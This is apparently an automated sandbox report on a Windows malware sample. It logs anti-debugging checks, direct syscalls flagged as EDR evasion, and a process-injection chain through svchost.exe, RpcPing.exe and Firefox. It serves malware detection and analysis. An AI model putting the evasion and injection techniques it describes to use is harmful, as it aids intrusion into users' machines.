            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]2_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]2_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]2_2_032C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]2_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]2_2_03260854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]2_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]2_2_03234859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]2_2_03230887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]2_2_032BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]2_2_032FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]2_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]2_2_0326C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]2_2_0325E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]2_2_0325EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]2_2_032E6F00
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread register set: target process: 348Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread APC queued: target process: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69C008Jump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xBzBOQwywT.exe"Jump to behavior
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: xBzBOQwywT.exe, IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: IpIaYUETnYWFH.exe, 00000004.00000000.1729912660.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000004.00000002.3364368636.00000000012C1000.00000002.00000001.00040000.00000000.sdmp, IpIaYUETnYWFH.exe, 00000006.00000002.3364832974.0000000000ED1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: xBzBOQwywT.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
